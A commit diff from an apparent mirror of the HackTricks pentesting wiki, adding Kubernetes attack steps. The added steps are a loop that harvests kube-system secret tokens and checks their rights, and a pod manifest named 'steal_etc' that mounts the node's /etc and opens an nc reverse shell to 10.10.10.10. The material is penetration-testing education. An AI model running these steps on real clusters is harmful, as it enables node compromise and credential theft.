0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

GitBook: [master] 454 pages modified

This commit is contained in:
CPol 2021-04-29 12:12:01 +00:00 committed by gitbook-bot
parent f7b6e4a914
commit b486b9fee1
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
2 changed files with 41 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
pentesting/pentesting-kubernetes/enumeration-from-a-pod.md
View File

@ -74,7 +74,7 @@ They open a streaming connection that returns you the full manifest of a Deploym
{% hint style="danger" %}
The following `kubectl` commands indicates just how to list the objects. If you want to access the data you need to add the option `-o json` or `-o yaml`
The following `kubectl` commands indicates just how to list the objects. If you want to access the data you need to use `describe` instead of `get`
{% endhint %}
### Get namespaces
@ -115,6 +115,12 @@ https://<Kubernetes_API_IP>:<port>/api/v1/namespaces/custnamespace/secrets/
{% endtab %}
{% endtabs %}
If you can read secrets you can use the following lines to get the privileges related to each to token:
```bash
for token in `./kubectl describe secrets -n kube-system | grep "token:" | cut -d " " -f 7`; do echo $token; ./kubectl --token $token auth can-i --list; echo; done
```
### Get Current Privileges
{% tabs %}

34
pentesting/pentesting-kubernetes/hardening-roles-clusterroles.md
View File

@ -89,6 +89,40 @@ So just create the malicious pod and expect the secrets in port 6666:
![](../../.gitbook/assets/image%20%28470%29.png)
## **Pod Creationv2**
Having Pod create permissions over kube-system you can also be able to mount directories from the node hosting the pods with a pod template like the following one:
{% code title="steal\_etc.yaml" %}
```yaml
apiVersion: v1
kind: Pod
metadata:
name: stealetc-pod
spec:
containers:
- name: givemeyouretc
image: alpine
command: ["/bin/sh"]
args: ["-c", "nc 10.10.10.10 4444 -e /bin/sh"]
volumeMounts:
- mountPath: /mnt
name: volume
volumes:
- name: volume
hostPath:
path: /etc
```
{% endcode %}
Create the pod with:
```bash
kubectl --token $token create -f abuse2.yaml
```
And capturing the reverse shell you can find the `/etc` directory of the node mounted in `/mnt` inside the pod.
## **Create/Update Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs**
Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs are all privileges that allow the creation of different tasks in the cluster. Moreover, it's possible can use all of them to **develop pods and even create pods**. So it's possible to a**buse them to escalate privileges just like in the previous example.**